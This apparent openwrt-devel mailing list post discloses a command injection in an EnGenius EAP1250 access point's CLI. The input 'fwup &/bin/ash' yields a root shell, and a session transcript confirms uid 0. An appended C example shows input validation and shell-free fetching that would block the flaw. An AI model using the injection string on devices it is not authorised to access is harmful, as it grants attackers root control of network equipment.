> Okay .. Engenius problem sorted for the most part, and this works on

FWIW I found an easier way and this may be a (minor) security issue that
exists in other versions, didn't really check.
The "fwup" command accepts the '&' character that's a common URL
argument, but it accepts it unbounded.

Thus, be it for breaking into something so you can flash it (my use
case) or breaking out of the CLI otherwise (whereby now it's no longer
a 'feature' as before)

All one need do for a root shell in the CLI "jail" .. is "mgmt" ->
"fwgrade" -> "fwup &/bin/ash"
From here you simply curl your firmware into /tmp and mtd write it
(double check your board revision for the correct FDT, although
naturally I've already made that mistake and all that it breaks is the
radios, you can still telnet in and fix it without getting a chair and
paperclip)

Run-through of exactly that:

--snip--

eap1250/mgmt/fwgrade>fwup &/bin/ash

Device reload firmware... Please wait and try to reconnect later.


BusyBox v1.19.4 (2018-08-29 16:14:58 CST) built-in shell (ash)

Enter 'help' for a list of built-in commands.

~ #

Upgrade failed.

~ # id

uid=0(root) gid=0(root)

~ # uname -a

Linux EAP1250 3.14.43 #1 SMP PREEMPT Wed Aug 29 16:35:59 CST 2018
armv7l GNU/Linux


Cheers,

Michael Holstein CISSP
moholstein(at)gmail(dot)com

_______________________________________________
openwrt-devel mailing list
openwrt-devel@lists.openwrt.org
https://lists.openwrt.org/mailman/listinfo/openwrt-devel
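
Added example, not part of the original message and not EnGenius code: one way a CLI handler could treat the "fwup" argument so that input such as "&/bin/ash" never reaches a shell. It assumes the firmware passes the argument to a shell command line (the message does not show the vendor's code); the function names, the allow-list and the curl path are hypothetical.

```c
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed allow-list for a firmware URL: a known scheme followed by a
 * small character set. '&' is legal in URLs in general but is excluded
 * here, since a firmware image URL does not need a query string. */
int fwup_arg_is_safe(const char *arg)
{
    static const char *schemes[] = { "http://", "https://", "tftp://" };
    size_t i, off = 0, n = strlen(arg);

    if (n == 0 || n > 255)
        return 0;
    for (i = 0; i < sizeof schemes / sizeof schemes[0]; i++)
        if (strncmp(arg, schemes[i], strlen(schemes[i])) == 0)
            off = strlen(schemes[i]);
    if (off == 0 || off == n)          /* no known scheme, or nothing after it */
        return 0;
    for (i = off; i < n; i++)
        if (!isalnum((unsigned char)arg[i]) && !strchr("._-/:", arg[i]))
            return 0;
    return 1;
}

/* Fetch without a shell: the URL is a single argv element, so nothing
 * in it is interpreted as a command separator. Returns -1 on rejection. */
int fwup_fetch(const char *url, const char *dest)
{
    pid_t pid;
    int status;

    if (!fwup_arg_is_safe(url))
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execl("/usr/bin/curl", "curl", "-fsS", "-o", dest, url, (char *)NULL);
        _exit(127);                    /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```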
